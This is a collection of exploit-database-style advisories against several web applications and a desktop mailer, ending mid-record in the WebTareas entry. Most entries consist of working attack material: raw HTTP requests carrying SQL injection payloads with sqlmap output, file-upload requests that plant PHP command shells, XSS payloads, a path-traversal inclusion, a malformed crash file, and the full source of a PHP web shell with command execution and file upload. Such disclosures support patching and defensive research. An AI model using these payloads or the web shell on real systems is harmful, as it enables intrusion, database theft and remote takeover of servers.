<pre><code># Exploit Title: Online shopping system advanced 1.0 - Multiple<br />Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2020-09-24<br /># Vendor Homepage:<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced<br /># Software Link :<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip<br /># Tested Version: 1.0<br /># Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +<br />php 5.X/7.X + MySQL<br /><br /># Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7<br />vulnerabilities<br /><br /># Vulnerability Type: SQL Injection - #1<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-89<br /><br />Vulnerability description: Online shopping system advanced 1.0 allows SQL<br />injection via the admin/edit_user.php, user_id parameter.<br /><br />Proof of concept:<br /><br />Save this content in a file:<br /><br />POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------120411781422335<br />Content-Length: 489<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br />puneeth@123<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br /><br /><br />-----------------------------120411781422335--<br /><br /><br />And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id<br /><br />(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to<br />keep testing the others (if any)? [y/N]<br />sqlmap identified the following injection point(s) with a total of 115<br />HTTP(s) requests:<br />---<br />Parameter: MULTIPART user_id ((custom) POST)<br /> Type: AND/OR time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind<br /> Payload: -----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25' AND SLEEP(5) AND 'HGWF'='HGWF<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br />puneeth@123<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br /><br /><br />-----------------------------120411781422335--<br />---<br />[16:25:28] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.38, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0.12<br /><br /><br /># Vulnerability Type: SQL Injection - #2<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-89<br /><br />Vulnerability description: Online shopping system advanced 1.0 allows SQL<br />injection via the action.php, proId parameter.<br /><br />Proof of concept:<br /><br />Save this content in a file:<br /><br />POST http://127.0.0.1/online/action.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: */*<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Host: 127.0.0.1<br /><br />addToCart=1&proId=70<br /><br /><br />And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId<br /><br />POST parameter 'proId' is vulnerable. Do you want to keep testing the<br />others (if any)? [y/N]<br />sqlmap identified the following injection point(s) with a total of 72<br />HTTP(s) requests:<br />---<br />Parameter: proId (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd<br /><br /> Type: AND/OR time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind<br /> Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv<br />---<br />[16:03:38] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.38, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0.12<br /><br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-434<br /><br />Vulnerability description: File Restriction Bypass vulnerabilities were<br />found in Online shopping system advanced v1.0. This allows for an<br />authenticated user to potentially obtain RCE via webshell.<br /><br />Proof of concept:<br /><br />1. Go the add product >> (admin/add_product.php)<br />2.- Select product image and load a valid image.<br />3. Turn Burp/ZAP Intercept On<br />4. Select webshell - ex: shell.php<br />5. Alter request in the upload...<br /> Update 'filename' to desired extension. ex: shell.php<br /> Not neccesary change content type to 'image/png'<br /><br />Example exploitation request:<br /><br />====================================================================================================<br /><br />POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------184982084830387<br />Content-Length: 960<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/add_product.php<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="product_name"<br /><br />demo2<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="details"<br /><br />demo2<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="picture"; filename="shell.php"<br />Content-Type: image/gif<br /><br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="price"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="product_type"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="brand"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="tags"<br /><br />Summet<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------184982084830387--<br /><br />====================================================================================================<br /><br />6. To view the webshell path go to Product List (admin/cosmetics_list.php)<br />7. Send the request and visit your new webshell<br /> Ex:<br />http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami<br /> nt authority\system<br /><br /># Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0, does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in<br />multiple parameter.<br /><br />Proof of concept:<br /><br />Stored:<br /><br />POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------120411781422335<br />Content-Length: 496<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br /></td><script>alert(1);</script><td><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br /><br /><br />-----------------------------120411781422335--<br /><br /><br /># Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0, does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in<br />multiple parameter.<br /><br />Proof of concept:<br /><br />Stored:<br /><br />POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 192<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/add_user.php<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.1<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0, does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in<br />page parameter.<br /><br />Proof of concept:<br /><br />Reflected:<br /><br />http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2<br /><br />CVSS v3: 6.1<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0, does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,<br />in page parameter.<br /><br />Proof of concept:<br /><br />Reflected:<br /><br />http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E<br /><br /></code></pre>
<pre><code># Exploit Title: SuperMailer v11.20 - Buffer overflow DoS<br /># Exploit Author: Rafael Pedrero<br /># Discovery Date: 2021-02-07<br /># Vendor Homepage:<br />https://int.supermailer.de/download_newsletter_software.htm<br /># Software Link : https://int.supermailer.de/smintsw.zip /<br />https://int.supermailer.de/smintsw_x64.zip<br /># Tested Version: v11.20 32bit/64bit [11.20.0.2204]<br /># Tested on: Windows 7, 10<br /><br />CVSS v3: 3.3<br />CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L<br />CWE: CWE-20<br /><br />Vulnerability description: A vulnerability in Newsletter Software<br />SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to<br />cause a process crash resulting in a Denial of service (DoS) condition for<br />the application on an affected system. The vulnerability exists due to<br />insufficient validation of certain elements with a configuration file<br />malformed. An attacker could exploit this vulnerability by sending a user a<br />malicious SMB (configuration file) file through a link or email attachment<br />and persuading the user to open the file with the affected software on the<br />local system. A successful exploit could allow the attacker to cause the<br />application to crash when trying to load the malicious file.<br /><br />Proof of concept:<br /><br />1.- Go to File -> Save program options...<br />2.- Save the file (default extension *.smb)<br />3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb<br />file<br /><br />Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /><br />00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA<br />00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........<br />000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.<br />000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.<br />00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.<br />00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.<br />00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.<br />00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.<br />00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.<br />00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.<br />00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........<br /><br />And save the file.<br /><br />4.- Go to File -> Restore program options...<br />5.- The application "sm.exe" crash.<br /><br /></code></pre>
<pre><code># Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-31<br /># Vendor Homepage: https://www.youphptube.com/<br /># Software Link : https://www.youphptube.com/<br /># Tested Version: 7.8<br /># Tested on: Windows 7, 10 using XAMPP<br /><br /># Vulnerability Type: LFI + Path Traversal<br /><br />CVSS v3: 7.5<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-829, CWE-22<br /><br />Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory<br />traversal and Local File Inclusion through the parameter in an<br />/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an<br />include_once in locale/function.php page.<br /><br />Proof of concept:<br /><br />To detect: http://localhost/youphptube/index.php?lang=)<br /><br />An error is generated:<br /><br />Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0<br />in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47<br /><br />In function.php page, we can see:<br /><br />// filter some security here<br />if (!empty($_GET['lang'])) {<br /> $_GET['lang'] = str_replace(array("'", '"', """, "'"),<br />array('', '', '', ''), xss_esc($_GET['lang']));<br />}<br /><br />if (empty($_SESSION['language'])) {<br /> $_SESSION['language'] = $config->getLanguage();<br />}<br />if (!empty($_GET['lang'])) {<br /> $_GET['lang'] = strip_tags($_GET['lang']);<br /> $_SESSION['language'] = $_GET['lang'];<br />}<br />@include_once<br />"{$global['systemRootPath']}locale/{$_SESSION['language']}.php";<br /><br /><br />The parameter "lang" can be modified and load a php file in the server.<br /><br /><br />In Document root: /phpinfo.php with this content:<br /><br /><?php echo phpinfo(); ?><br /><br /><br />To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo<br /><br />Note: phpinfo without ".php".<br /><br />The new Path is:<br />@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";<br /><br />And you can see the PHP information into the browser.<br /><br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently<br />encode user-controlled inputs, resulting in a reflected Cross-Site<br />Scripting (XSS) vulnerability via the<br />/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri<br />parameter.<br /><br />Proof of concept:<br /><br />http://localhost/<br /><YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt><br /> <br /><br /></code></pre>
<pre><code>## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)<br />## Exploit Author: nu11secur1ty<br />## Date: 10.12.2022<br />## Vendor: https://code4berry.com/projects/beautysalon.php<br />## Software: https://code4berry.com/project%20downloads/beautysalon_download.php<br />## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt<br /><br />## Description:<br />The parameter `userimage` from Beauty-salon-2022 suffers from Web<br />Shell-File Upload - RCE.<br />NOTE: The user permissions of this system are not working correctly, and<br />the function is not sanitizing well.<br />The attacker can use an already created account from someone who controls<br />this system and he can upload a very malicious file by using this<br />vulnerability,<br />or more precisely (no sanitizing of function for edit image), for whatever<br />account, then he can execute it from anywhere on the external network.<br /><br />Status: HIGH Vulnerability<br /><br />[+] Exploit:<br /><br />```php<br /><!-- Project Name : PHP Web Shell --><br /><!-- Version : 4.0 nu11secur1ty --><br /><!-- First development date : 2022/10/05 --><br /><!-- This Version development date : 2022/10/05 --><br /><!-- Moded and working with PHP 8 : 2022/10/05 --><br /><!-- language : html, css, javascript, php --><br /><!-- Developer : nu11secur1ty --><br /><!-- Web site : https://www.nu11secur1ty.com/ --><br /><br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "<br />http://www.w3.org/TR/html4/strict.dtd"><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html" charset="euc-kr"><br /><title>PHP Web Shell Ver 4.0 by nu11secur1ty</title><br /><script type="text/javascript"><br />function FocusIn(obj)<br />{<br />if(obj.value == obj.defaultValue)<br />obj.value = '';<br />}<br /><br />function FocusOut(obj)<br />{<br />if(obj.value == '')<br />obj.value = obj.defaultValue;<br />}<br /></script><br /></head><br /><body><br /><b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo<br />$_SERVER['REQUEST_URI'] ?></b><br><br><br /><br />HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br><br />REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br><br /><br /><br><br /><br /><form name="cmd_exec" method="post" action="http://<?php echo<br />$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"><br /><input type="text" name="cmd" size="70" maxlength="500" value="Input<br />command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"<br />onblur="FocusOut(document.cmd_exec.cmd)"><br /><input type="submit" name="exec" value="exec"><br /></form><br /><?php<br />if(isset($_POST['exec']))<br />{<br />exec($_POST['cmd'],$result);<br /><br />echo '----------------- < OutPut > -----------------';<br />echo '<pre>';<br />foreach($result as $print)<br />{<br />$print = str_replace('<','<',$print);<br />echo $print . '<br>';<br />}<br />echo '</pre>';<br />}<br />else echo '<br>';<br />?><br /><br /><form enctype="multipart/form-data" name="file_upload" method="post"<br />action="http://<?php echo $_SERVER['HTTP_HOST']; echo<br />$_SERVER['REQUEST_URI'] ?>"><br /><input type="file" name="file"><br /><input type="submit" name="upload" value="upload"><br><br /><input type="text" name="target" size="100" value="Location where file will<br />be uploaded (include file name!)"<br />onfocus="FocusIn(document.file_upload.target)"<br />onblur="FocusOut(document.file_upload.target)"><br /></form><br /><?php<br />if(isset($_POST['upload']))<br />{<br />$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);<br /><br />if($check == TRUE)<br />echo '<pre>The file was uploaded successfully!!</pre>';<br />else<br />echo '<pre>File Upload was failed...</pre>';<br />}<br />?><br /></body><br /></html><br />```<br /><br /><br /># Proof and Exploit:<br />[href](https://streamable.com/ewdmoh)<br /><br /># m0e3:<br />[href](<br />https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html<br />)<br /></code></pre>
<pre><code># Exploit Title: iBooking v1.0.8 - Arbitrary File Upload<br /># Exploit Author: d1z1n370/oPty<br /># Date: 01/11/2022<br /># Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088<br /># Tested on: Linux<br /># Version: 1.0.8<br /><br /># Exploit Description:<br />The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.<br /><br /><br /># PoC request <br /><br />POST https://localhost/dashboard/upload-new-media HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/dashboard/settings<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062<br />Content-Length: 449<br />Connection: close<br />Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c<br /><br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="_token"<br /><br />kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="is_modal"<br /><br />1<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="file"; filename="upload.php56"<br />Content-Type: image/gif<br /><br />GIF89a;<br /><?php system($_GET['a']); phpinfo(); ?><br />-----------------------------115904534120015298741783774062--<br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection<br /># Date: 26/03/2023<br /># Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)<br /># Vendor Homepage: https://www.supremainc.com/<br /># Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp<br /># Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide<br /># Version: 2.8.16<br /># Tested on: Windows, Linux<br /><br />## Description <br />A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. <br /><br />## Request PoC #1<br />'''<br />POST /api/users/absence?search_month=1 HTTP/1.1<br />Host: biostar2.server.net<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />content-type: application/json;charset=UTF-8<br />content-language: en<br />bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548<br />Content-Length: 204<br />Origin: https://biostar2.server.net<br />Connection: close<br />Referer: https://biostar2.server.net/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}<br /><br />'''<br /><br />Time based SQL injection (set 4 – response delays for 8 seconds).<br /><br />'''<br /><br />## Request PoC #2<br />'''<br />POST /api/users/absence?search_month=1 HTTP/1.1<br />Host: biostar2.server.net<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />content-type: application/json;charset=UTF-8<br />content-language: en<br />bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548<br />Content-Length: 188<br />Origin: https://biostar2.server.net<br />Connection: close<br />Referer: https://biostar2.server.net/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}<br /><br />'''<br /><br />Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)<br /><br />'''<br /><br />## Exploit with SQLmap<br /><br />Save the request from Burp Suite to file.<br /><br />'''<br />---<br />Parameter: JSON #1* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}<br />---<br />[05:02:49] [INFO] testing MySQL<br />[05:02:49] [INFO] confirming MySQL<br />[05:02:50] [INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL > 5.0.0 (MariaDB fork)<br />[05:02:50] [INFO] fetching database names<br />[05:02:50] [INFO] fetching number of databases<br />[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />[05:02:55] [INFO] retrieved: 2<br />[05:03:12] [INFO] retrieved: biostar2_ac<br />[05:03:56] [INFO] retrieved: information_schema<br />available databases [2]:<br />[*] biostar2_ac<br />[*] information schema<br /><br />'''<br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) <br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example <br />-----------------------------------------------------------------------------------------------------------------------<br />Param: webTareasSID in cookie<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/administration/admin.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout<br />Connection: close<br />Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 302 Found<br />Date: Sat, 15 Oct 2022 11:38:50 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: 